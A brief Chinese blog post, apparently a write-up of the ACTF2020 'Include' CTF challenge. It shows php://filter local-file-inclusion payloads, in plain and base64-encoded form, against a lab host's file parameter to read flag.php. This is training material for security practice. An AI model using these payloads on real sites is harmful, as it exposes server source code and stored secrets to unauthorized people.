进入靶场:
![[ACTF2020 新生赛]Include 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030219364.jpg)
根据题目提示的include,想到使用php://filter读取文件
读取文件payload:
# 明文读取
index.php?file1=php://filter/resource=file.txt
# 编码读取
index.php?file1=php://filter/read=convert.base64-encode/resource=file.txt
构造payload:
http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=php://filter/resource=flag.php
http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php
![[ACTF2020 新生赛]Include 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030220589.jpg)
明文读取无效,尝试编码读取
![[ACTF2020 新生赛]Include 1](http://ytso-blog-oss-img.oss-accelerate.aliyuncs.com/wp-content/uploads/2022/07/09/20220710030222955.jpg)
得到flag!
原创文章,作者:wure,如若转载,请注明出处:https://blog.ytso.com/tech/pnotes/273237.html